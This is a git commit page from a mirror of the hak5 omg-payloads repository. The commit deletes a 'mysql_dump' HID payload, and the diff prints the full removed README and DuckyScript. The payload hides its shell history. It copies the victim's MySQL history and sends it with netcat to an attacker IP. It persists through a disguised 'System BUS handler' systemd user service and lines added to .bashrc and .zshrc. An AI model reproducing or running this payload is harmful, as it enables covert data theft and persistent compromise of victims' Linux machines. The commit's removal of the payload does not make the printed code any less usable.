hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Delete payloads/library/execution/mysql_dump directory

pull/190/head
drapl0n 2023-07-09 19:56:57 +05:30 committed by GitHub
parent f8bdb2a2d2
commit 27c2a408bd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 0 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
payloads/library/execution/mysql_dump/README.md
View File

@ -1,33 +0,0 @@
## About:
* Title: mysql_dump
* Description: mysql_dump, a oneliner payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltaration
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID.
## mysql_dump: mysql_dump payload exfiltrates MySQL history, which can be used to understand targets database schema.
### Features:
* Exfiltrates mysql_history.
* Fully Persistent.
* Waits for target to get online.
* Transfers loot once target is online.
* Oneliner payload.
### Workflow:
1. Search if mysql_history file is present.
2. Creating Loot transfer mechanism in targets system.
3. Creating local systemd service for persistence.
4. Executing Autotart mechanism.
### Usage:
1. Run netcat listner on attacking machine: `nc -lvp <port number> > <output_filename>`
2. Example: `nc -lvp 4444 > mysql_history.txt
### Changes to be made:
* Replace IP address(twice) `0.0.0.0` and Port Number `4444` on line `15`.
#### Support me if you like my work:
* https://twitter.com/drapl0n

22
payloads/library/execution/mysql_dump/payload.txt
View File

@ -1,22 +0,0 @@
REM Title: mysql_dump
REM Description: mysql_dump, is a oneliner payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Exfiltaration.
REM Target: GNU/Linux.
REM Attackmodes: HID.
DELAY 2000
CTRL ALT t
DELAY 2000
STRING unset HISTFILE
ENTER
DELAY 200
STRING echo -e "#\!/bin/bash\nls -a ~/ | grep -w '.mysql_history' &> /dev/null\nif [ \$? = 0 ]; then\n\tmkdir -p ~/.config/systemd/user\n\tmkdir -p /var/tmp/.system\n\tcp ~/.mysql_history /tmp/exfil\n\techo -e \"while :\\\ndo\\\n\\\tping -c 5 8.8.8.8\\\n\\\tif [ \\\$? -eq 0 ]; then\\\n\\\t\\\tnc -c 127.0.0.1 4444 < /tmp/exfil\\\n\\\tfi\\\ndone\" > /var/tmp/.system/systemBus\n\tchmod +x /var/tmp/.system/systemBus\n\techo -e \"[Unit]\\\nDescription= System BUS handler\\\n\\\n[Service]\\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\\nRestart=on-failure\\\nSuccessExitStatus=3 4\\\nRestartForceExitStatus=3 4\\\n\\\n[Install]\\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\n\tsystemctl --user enable --now systemBUS.service\n\tsystemctl --user start --now systemBUS.service\n\techo -e \"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\\\nfi\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\\\nfi\" > /tmp/tmmmp\n\tchmod +x /tmp/tmmmp && /tmp/./tmmmp && rm /tmp/tmmmp \nfi" > /tmp/system
ENTER
DELAY 200
STRING chmod +x /tmp/system
ENTER
DELAY 200
STRING /tmp/./system && rm /tmp/system && exit
ENTER